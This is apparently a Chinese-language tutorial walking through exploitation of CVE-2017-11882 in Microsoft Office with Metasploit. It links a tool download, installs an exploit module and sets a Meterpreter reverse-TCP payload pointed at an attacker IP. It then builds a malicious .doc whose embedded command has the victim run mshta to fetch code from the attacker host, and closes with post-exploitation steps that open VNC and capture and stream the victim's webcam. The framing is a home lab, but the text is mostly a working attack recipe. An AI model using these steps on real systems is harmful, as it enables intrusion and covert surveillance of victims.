cve-2017-11882生成office惡意文件
Microsoft Office 2000
Microsoft Office 2003 Microsoft Office 2007 Service Pack 3 Microsoft Office 2010 Service Pack 2 Microsoft Office 2013 Service Pack 1 Microsoft Office 2016
工具鏈接:https://pan.baidu.com/s/1cAPboI5lawjxD2VPT13ABA 密碼:fxrf
還是老樣子KaliLinux做gongji機 ip:192.168.1.126
受害者主機Windows7 ip:192.168.1.128
1.首先把cve開頭的文件放到kalilinux使用
2.將cve_2017_11882.rb文件復制到/usr/share/metasploit-framework/modules/exploits/windows/smb/目錄下
mv cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
3.再將cve_2017_11882.rtf放到/usr/share/metasploit-framework/data/exploits/ 目錄下
mv cve_2017_11882.rtf /usr/share/metasploit-framework/data/exploits
ls /usr/share/metasploit-framework/data/exploits
4.打開神器圖形化操作的msf(命令都一樣只是這個更容易方便演示)
為了你們太萌新我特地標了一下如何掃描ip地址和爆系統然後輸入ip地址即可(只是為了效果好而已)
小電腦就出來了還猜出來是Windows7
5.然後在下面輸入search cve_2017_11882查看有沒有加載進去這個模塊
可能我版本比較高所以官方已經出了這個模塊所以有兩個
6.use exploit/windows/smb/cve_2017_11882 使用這個模塊
7.set payload windows/meterpreter/reverse_tcp
show options 查看一下配置
8.set lhost 192.168.1.126 為自己的×××機
set uripath emmm emmm為路徑稍後用python生成腳本的時候用得到(後面我又改成test了 然後 set lport 4444改一下端口才運行)
show options 再看一下配置
(後面uripath我又改成test了 然後 set lport 4444改一下端口才運行)
9.exploit -j 運行
10.在終端生成doc文件
python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.126:8080/test" -o test.doc 生成doc文件
然後將doc文件放到Windows7上(順便安裝office)
看到這個文檔然後手賤點了一下
成功
然後還是老樣子
getuid getpid getvnc
webcam_list 查看下攝像頭 webcam_snf 1 照個照片 webcam_stream 開個網頁查看攝像頭
cve-2017-11882生成office惡意文件